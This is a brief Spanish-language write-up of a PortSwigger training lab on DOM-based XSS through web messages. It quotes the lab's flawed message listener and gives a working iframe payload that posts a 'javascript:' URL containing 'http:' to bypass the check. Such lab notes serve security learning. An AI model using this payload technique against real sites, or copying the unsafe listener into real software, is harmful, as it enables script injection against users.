Lab 2: DOM XSS using web messages and a JavaScript URL
https://portswigger.net/web-security/dom-based/controlling-the-web-message-source/lab-dom-xss-using-web-messages-and-a-javascript-url
El aplicativo web tiene en el código HTML lo siguiente:
<script>
window.addEventListener('message', function(e) {
var url = e.data;
if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) {
location.href = url;
}
}, false);
</script>
Creamos un aplicativo web con el siguiente codigo:
<iframe src="https://0af400be04bea2368159757100070042.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:alert(2024)//http:','*')">
Y luego de lo anterior:

Es importante resaltar, que el script valida o busca la existencia de la siguiente palabra: http:
Si esta no se encuentra presente no se desplegara el XSS.
AnteriorLab 1: DOM XSS using web messagesSiguienteLab #1: Manipulating WebSocket messages to exploit vulnerabilities
Última actualización
¿Te fue útil?